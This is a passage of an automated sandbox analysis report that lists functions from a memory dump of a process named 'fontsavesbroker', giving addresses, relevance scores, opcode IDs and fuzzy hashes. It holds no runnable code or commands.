                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 6ce3d2ce49a7fb7faa9a195acfaacbc2dbbb9b1f88b2918b08f5bf0d32cce535
                • Instruction ID: 58baed92ded701fadf5566e768acbb97c7a173881a8fb0cc0e5aa3e522845a5b
                • Opcode Fuzzy Hash: 6ce3d2ce49a7fb7faa9a195acfaacbc2dbbb9b1f88b2918b08f5bf0d32cce535
                • Instruction Fuzzy Hash: 12018430A1E74E4FD752A7B488A86A93BF0EF16305F4649F7D418C70B7EA28A5448750
                Function 00007FFD9B77275D Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 311138d78718fe1e9cfdb3e16e5ccb972e2993cf0762c63e2361318b295ae9d3
                • Instruction ID: 73d5c13792ea4f379fc1d0d182603b01a127fecdcf45628f44f8d4d57b023fb2
                • Opcode Fuzzy Hash: 311138d78718fe1e9cfdb3e16e5ccb972e2993cf0762c63e2361318b295ae9d3
                • Instruction Fuzzy Hash: 7DF02430A1A78E8FDB199FB088646B93BA0FF07305F8145BED819C61E2DB38A504CB40
                Function 00007FFD9B77DA29 Relevance: .4, Instructions: 430COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 78a3129dc3bcf7b978fbe94fd1ab2011d976a715a812cedfb89c1764f0806d4c
                • Instruction ID: 3d733b5bacd1aa1419e70a79b82f9c839681ccbdba45e6942309d5032c0954a8
                • Opcode Fuzzy Hash: 78a3129dc3bcf7b978fbe94fd1ab2011d976a715a812cedfb89c1764f0806d4c
                • Instruction Fuzzy Hash: 22F13D71E1965E8FEB68DFA8C4A57B8B7A1FF58301F4402BAD00DD72E6DA746940CB40
                Function 00007FFD9B77354B Relevance: .1, Instructions: 146COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5857516bf52b8b6312a9574e9e574ace676e0262860ee414f7cdc0f6411a0965
                • Instruction ID: 86731b395f675f27d2960689e151e05286abeb9892701a219db9c121290a3da3
                • Opcode Fuzzy Hash: 5857516bf52b8b6312a9574e9e574ace676e0262860ee414f7cdc0f6411a0965
                • Instruction Fuzzy Hash: DB41A471E1994E8FEB94DB68C8A5AFC7BE1FF59300F4502B9D00EC32E6DE6569018750
                Function 00007FFD9B77368E Relevance: .1, Instructions: 132COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 90c2e9e107bf103cbf83036ad7da6b55eba44b23d1d70fef1df5ae2a2f6cc7a7
                • Instruction ID: 395c63352de81790010bce6ddca04793cd1f40ffd1133ce85f70531923bd63e2
                • Opcode Fuzzy Hash: 90c2e9e107bf103cbf83036ad7da6b55eba44b23d1d70fef1df5ae2a2f6cc7a7
                • Instruction Fuzzy Hash: 6741A071A19A0E8EE794DF6CD8647AD7BE1EB96314F5002BAD04DC32DADBF914068B40
                Function 00007FFD9B77C2FD Relevance: .1, Instructions: 103COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1780726810c498ada1515b77a56e59f1715fc07b3ffcf54a1fed08c83693f75
                • Instruction ID: d73d7b23197c278557b3765f5776c214c835b9444367c35ad648905c6ad4125c
                • Opcode Fuzzy Hash: d1780726810c498ada1515b77a56e59f1715fc07b3ffcf54a1fed08c83693f75
                • Instruction Fuzzy Hash: 3D31E970E1DA1D8FEBA4EBA8D4A56ACB7B1FF59300F510279D00DE32A2CE6469418B40
                Function 00007FFD9B77C34E Relevance: .1, Instructions: 91COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 42bd22fc8430b7883b4a13e99e64ca19f630d4e865128481c945c367e062b142
                • Instruction ID: 8654ad11bb0dc65e321cabbaacc22f04c8eedd104a8b6063486014b30c8d96c1
                • Opcode Fuzzy Hash: 42bd22fc8430b7883b4a13e99e64ca19f630d4e865128481c945c367e062b142
                • Instruction Fuzzy Hash: D721EE71E09A1D8FEBA4EBA8D4A56BCB7B1FF59300F51023AD00DE32A2DE6469419740
                Function 00007FFD9B7734A5 Relevance: .1, Instructions: 83COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 865065228c4f399ad44286de971c5e3b812dffaa85400c34fc835fe43a92ff11
                • Instruction ID: e8049d37ba1a6a4021b2d67add660aa200a35e741a1a6a023930a016c6ae0556
                • Opcode Fuzzy Hash: 865065228c4f399ad44286de971c5e3b812dffaa85400c34fc835fe43a92ff11
                • Instruction Fuzzy Hash: 78218F30E0A64E8FEB69EFA484A91BD7BA0FF14304F1205BED419C71B1DB75A640C740
                Function 00007FFD9B7723B6 Relevance: .1, Instructions: 82COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 049c738657e0783604409de6d8b34992e71445ce957c230c0b6ed199f95ca636
                • Instruction ID: 3fee5478bc3605d4a6c9f6327280c3fba92516f5144c199faa22688fe0ae9c6f
                • Opcode Fuzzy Hash: 049c738657e0783604409de6d8b34992e71445ce957c230c0b6ed199f95ca636
                • Instruction Fuzzy Hash: E2311031E0A61D8EEB64DB94C8A57FCB2B4EF56310F5112B5D01DA31B2DEB86B458A40
                Function 00007FFD9B770F2E Relevance: .1, Instructions: 66COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 986bec252ae6e504f30106b321135551d7f2f81b01788d0717deeae71ad10f2f
                • Instruction ID: a026052b56c14f41021afd86c4472fe99f20c07846414dcc9944c38e1f2bb2f6
                • Opcode Fuzzy Hash: 986bec252ae6e504f30106b321135551d7f2f81b01788d0717deeae71ad10f2f
                • Instruction Fuzzy Hash: 51211F31B19A0D8BEF64EB94C8A4EED73B5EF54300F114275D409D72A5DE74AA458B80
                Function 00007FFD9B771F49 Relevance: .1, Instructions: 60COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0ebcfa6d88a31fa46b1eedebe489a0f9cf5c7fbd71e318973e9dfdb2e97770ca
                • Instruction ID: 649962c3cfe00abe8bd53a3892dcb44462afd9fef2984aca38ec13c0eb65d9ec
                • Opcode Fuzzy Hash: 0ebcfa6d88a31fa46b1eedebe489a0f9cf5c7fbd71e318973e9dfdb2e97770ca
                • Instruction Fuzzy Hash: 64115E14A4F3C64EDB22977944A45617FE09F03224B6E46FAD0D8CB4F3DA5C598AC352
                Function 00007FFD9B77CA40 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dcd131ae91cf4ba8e0e116b90b5da67e440acb25be02335cae459ff2ea0355eb
                • Instruction ID: 2f6625d8edbaffb761d8dd6b582f4cf49582d2dd8f0cf28552f5860acafb8c4e
                • Opcode Fuzzy Hash: dcd131ae91cf4ba8e0e116b90b5da67e440acb25be02335cae459ff2ea0355eb
                • Instruction Fuzzy Hash: A9115A30A19A0E8EEB55EBB4C4A86BA77E0FF18305F5105BAD41AC71A1DE7466508B40
                Function 00007FFD9B77CE30 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 40163f3b474ab73092b5a09c290e9b7feb0fefe4b828e1cd961572ec735d386c
                • Instruction ID: c724a9643e83a86df4672604b6e5c261b840c75c1ce0aa18e09008edda2338f1
                • Opcode Fuzzy Hash: 40163f3b474ab73092b5a09c290e9b7feb0fefe4b828e1cd961572ec735d386c
                • Instruction Fuzzy Hash: 04118230A09A0E9FEB58EFA8C4696BE76A1FF58301F11067AD41DC21A5DE34E250C740
                Function 00007FFD9B7705D8 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8e090d5ad4b62b31c2633c5d0079da8869d58603f004c7bedcb1b8156081833c
                • Instruction ID: 6b9a42956136d9ef68faeade9d161d008ad0d0b2288f97309b62882f15e7a37d
                • Opcode Fuzzy Hash: 8e090d5ad4b62b31c2633c5d0079da8869d58603f004c7bedcb1b8156081833c
                • Instruction Fuzzy Hash: 54018030A0560E8EEB58EFA4C0A96B977A1EF58305F21057AD40EC35E5CA71A650C740
                Function 00007FFD9B77E3C0 Relevance: .0, Instructions: 49COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5a9443aca08aa10705e23668fc9406d305993ef560e3d68bb4f8f8c8764d5822
                • Instruction ID: 5863859db9e4117e62a0ba4b486810f9a6b9e8c871fd15d17696609a8059c727
                • Opcode Fuzzy Hash: 5a9443aca08aa10705e23668fc9406d305993ef560e3d68bb4f8f8c8764d5822
                • Instruction Fuzzy Hash: E3012130E0860E8FDB54EF68C4985BA77B5FF98305F104676E419C31A9DB74A595CB80
                Function 00007FFD9B780EA0 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cebef6a803ebc046cc47c008e39b18ecf9ec122647091e12dd8558a54a00d9ed
                • Instruction ID: 7982ba7ce4ccb4c71710e0c497f679ceec0a2b356a5792353a39aafc70b3c520
                • Opcode Fuzzy Hash: cebef6a803ebc046cc47c008e39b18ecf9ec122647091e12dd8558a54a00d9ed
                • Instruction Fuzzy Hash: F8011A30A16A0E8EEB94FFA4C4A86BE76E0FF18306F51057AD41ED21B5DB31A650CB40
                Function 00007FFD9B771BF1 Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 02ffb280dd11bb8906fd7b684ab50e9e1c70dbc0ae912bee417b77ae3e52d952
                • Instruction ID: 32fabcb6282d527791d01408bf554589f0265669411d242dcf5013202ff1d50b
                • Opcode Fuzzy Hash: 02ffb280dd11bb8906fd7b684ab50e9e1c70dbc0ae912bee417b77ae3e52d952
                • Instruction Fuzzy Hash: 9A01D130A0A78E8FEBA4DFA488A96B97BA1EF55301F5601BAD80CC34F1DB759650C740
                Function 00007FFD9B77E3A1 Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: db9fc56c81c544f195034354231b08ba994bc179b8a5b20e2758622869beaf1b
                • Instruction ID: 434d4a11b243269140cf6adb9b2e6cd4ec26c8ac7e29e701282b867c70cb1817
                • Opcode Fuzzy Hash: db9fc56c81c544f195034354231b08ba994bc179b8a5b20e2758622869beaf1b
                • Instruction Fuzzy Hash: 1F017C70D0D78E8FEB95DF6888982AA7BB0FF54301F4546BAE818C31A5DB7496548780
                Function 00007FFD9B7727CD Relevance: .0, Instructions: 44COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 596f03cf9448dc0f9a70f41085221daaeba859d28d752652feab6ba87d6001de
                • Instruction ID: 46d7d337fc982d7567170320cca93470e2df8cf1a0dd6f0b81c30bf0b2b0b7f1
                • Opcode Fuzzy Hash: 596f03cf9448dc0f9a70f41085221daaeba859d28d752652feab6ba87d6001de
                • Instruction Fuzzy Hash: 5101F730E0B64E8FE761EBA488995B97BE0FF1A300F060AF6D418C70B6EB74E5548740
                Function 00007FFD9B77ABA5 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dfc966fc14d08d593b80ad43e30823a3fa6c5c3e8b7ae490afeebdf66d9dc15d
                • Instruction ID: c5a81960167990b6d4d460c4d717089f118b4cecb6bec2e89df21c7a409ab31b
                • Opcode Fuzzy Hash: dfc966fc14d08d593b80ad43e30823a3fa6c5c3e8b7ae490afeebdf66d9dc15d
                • Instruction Fuzzy Hash: A501A235A0E74A4FE312EB68D8E59E93BB1EF5631070646F3D008CB0B3EE28A4448710
                Function 00007FFD9B77AB39 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c2375680d07848da1cd3e33dbedfb70d0ad15383d9b2f950717698f945efb7f
                • Instruction ID: ebea2749372d3c031164100df5753582042c731f013bf7b26dccd5f645949466
                • Opcode Fuzzy Hash: 0c2375680d07848da1cd3e33dbedfb70d0ad15383d9b2f950717698f945efb7f
                • Instruction Fuzzy Hash: 9B018431A5E74E4FE762ABB488A95B97BF1EF16300F060AF7D408C70B6EE64A5448701
                Function 00007FFD9B770608 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e187e653e2dac77ed824c3084109443d9a022db1e5d9125369dd495a8b083873
                • Instruction ID: 1614e2fa293111e6fcd5ab5ef034492da55cbf64119aaf2e2067c903b8bc4559
                • Opcode Fuzzy Hash: e187e653e2dac77ed824c3084109443d9a022db1e5d9125369dd495a8b083873
                • Instruction Fuzzy Hash: 3601D630A0660E8FDB69EBA4C4A85B933E0FF19305F50097ED42EC31F1DE75A150CA40
                Function 00007FFD9B770610 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d7013b014dc599e9287c0a346cf43b3f64d3fa6e990b06b317f0815b4734ac80
                • Instruction ID: e2c85e571f323b322ec00d6ec9a322739e4edeaa82331df0116a3278326125ce
                • Opcode Fuzzy Hash: d7013b014dc599e9287c0a346cf43b3f64d3fa6e990b06b317f0815b4734ac80
                • Instruction Fuzzy Hash: 3201D630A0660E8BDB58EBB4C4A85B973A0FF1A305F61057ED42EC31F4DE75A540CB40
                Function 00007FFD9B771230 Relevance: .0, Instructions: 40COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 193bd1e84e4c8db9edf91deb88b72459537b41ec3f88976aeb67d5749caf784c
                • Instruction ID: fcd7a1f6723a30a3ad7e12e4de82add3ab7ccb1d2ff7e0045e73b544e626209f
                • Opcode Fuzzy Hash: 193bd1e84e4c8db9edf91deb88b72459537b41ec3f88976aeb67d5749caf784c
                • Instruction Fuzzy Hash: 11F08171B1A64F8AEF649AA888B82BA77E4EB55214F01067AE419D34F1DA6467148340
                Function 00007FFD9B7705D0 Relevance: .0, Instructions: 39COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e9bc37307babae46c46525e49661b4065d20df401b3d5e260372080587a1a0c3
                • Instruction ID: f8a6f53222da567c4c69e1f82cd81481b0f6793a1651638ffa3cfb8572053522
                • Opcode Fuzzy Hash: e9bc37307babae46c46525e49661b4065d20df401b3d5e260372080587a1a0c3
                • Instruction Fuzzy Hash: 53F0C230A0A64E8FEB64EEA494696FA37A0EF15304F11057AE80DC34F1CE75A660CB40
                Function 00007FFD9B77ABB8 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2c1a4e4f4fcb01eb4e603ce5e7c17e85a737a7de2566236f9f03375dc0b38f7c
                • Instruction ID: f8ce1db05ab55a010b8bb224f34e4afdc02bbedb06de5ca969754a143d86e980
                • Opcode Fuzzy Hash: 2c1a4e4f4fcb01eb4e603ce5e7c17e85a737a7de2566236f9f03375dc0b38f7c
                • Instruction Fuzzy Hash: 18F09039A0D60E4FE710FBA8A4E48F933F2EF54315B114AB7D01DC70B6EE64A5844640
                Function 00007FFD9B77B364 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e2374be993e6d55504eb23cb94918584d376ef0a80e6a5520323f8e5ac49c18f
                • Instruction ID: bc217506953c9c7aa815e7ce6519cca739aff9532f3c0aa20fb48d70a74c4150
                • Opcode Fuzzy Hash: e2374be993e6d55504eb23cb94918584d376ef0a80e6a5520323f8e5ac49c18f
                • Instruction Fuzzy Hash: E8F0FF70A1AA1D8FDBA4DB14C4A9BE9B3B1FF58300F1142E6D00DD3265DF34AA828F40
                Function 00007FFD9B7726E9 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d3797f0dc378b6b0f4efb9dba0b881951b1f20933f52d2e54e91a5b85ec8471
                • Instruction ID: 77bc42f97e88ffa0daa5ea0befd34dab9a91220e9bff1b81da12b31fe04d8f55
                • Opcode Fuzzy Hash: 3d3797f0dc378b6b0f4efb9dba0b881951b1f20933f52d2e54e91a5b85ec8471
                • Instruction Fuzzy Hash: 2EF0623190F78D8FDB6A9B6488791A93BB0FF17300F4605BAD419C71F2EA789554C741
                Function 00007FFD9B771710 Relevance: .0, Instructions: 25COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0fe8a46c296d93708f61b05d60e40878e9e488cc7cac960711ac09eb02f71a12
                • Instruction ID: 3b6ddba814d7b6cca47e1dbe041f926ac8d7d7d709407876df0a6c5bbfd2da6d
                • Opcode Fuzzy Hash: 0fe8a46c296d93708f61b05d60e40878e9e488cc7cac960711ac09eb02f71a12
                • Instruction Fuzzy Hash: 2BE06520F0B60A46E734926880E557471D1DB41304FBA8774F01CC75F1EBACDE82C381
                Function 00007FFD9B77604B Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9ddfc5f56206669de20be1036a60959355c8aa41fe91eb8c2c8305a8730d77c3
                • Instruction ID: a9c6b5b87da7afd317bb580616f9cad921a1764d418752dfd06156f16e9d53ff
                • Opcode Fuzzy Hash: 9ddfc5f56206669de20be1036a60959355c8aa41fe91eb8c2c8305a8730d77c3
                • Instruction Fuzzy Hash: 49E05970E5992E9EDBA4DB48C894BBD77B1FB58301F1101BDC11DD32A5DA705A81CF44
                Function 00007FFD9B77E649 Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e48b8d8d78ead12cf4239562d578f06b141cb1a156202681a4e36c2d0b9765da
                • Instruction ID: 1688eaccf6ec519599b14ae625202d1225dd4358a04a677706fb5c0b6abd39e1
                • Opcode Fuzzy Hash: e48b8d8d78ead12cf4239562d578f06b141cb1a156202681a4e36c2d0b9765da
                • Instruction Fuzzy Hash: B1F0C034B0969D8BEB24EB04CC91BAD73B6FB94311F0542A5D00D972A5CB746F818F41
                Function 00007FFD9B77BE53 Relevance: .0, Instructions: 20COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b192cd5b06488316db087836aa4ddda2474db24bc0158c281008add675c9bdd3
                • Instruction ID: 0b1dd8d072982ae11258ccb15d994c343ad86a419487a36ff78964521c5619d3
                • Opcode Fuzzy Hash: b192cd5b06488316db087836aa4ddda2474db24bc0158c281008add675c9bdd3
                • Instruction Fuzzy Hash: 04E04EB0E0920E9BDB28DF94D4E55BDB7B1EF14200F610529E419A32A1CAB469508B80
                Function 00007FFD9B77BF1F Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28bdbf73e458c66e6c73acbfe0d9b65e8ec568619fc3506dfaa08a2ca4efe61c
                • Instruction ID: 5644c1b05845e7c3a940db9226061fbd08ed31e3b0ed6eb50d31d17fecd23f1a
                • Opcode Fuzzy Hash: 28bdbf73e458c66e6c73acbfe0d9b65e8ec568619fc3506dfaa08a2ca4efe61c
                • Instruction Fuzzy Hash: 0CD0E271A0894D8EDF50EFC8D4909ECBBB0EF58301F000022D10CD3260CA20A4508B80

                Non-executed Functions

                Function 00007FFD9B77FA09 Relevance: 6.3, Strings: 5, Instructions: 95COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: '$H$U$[$i
                • API String ID: 0-3970984591
                • Opcode ID: 1038e454c1c1a2dfc0abafdae40b95744a7679b55e81dde3abd8c4275def21d0
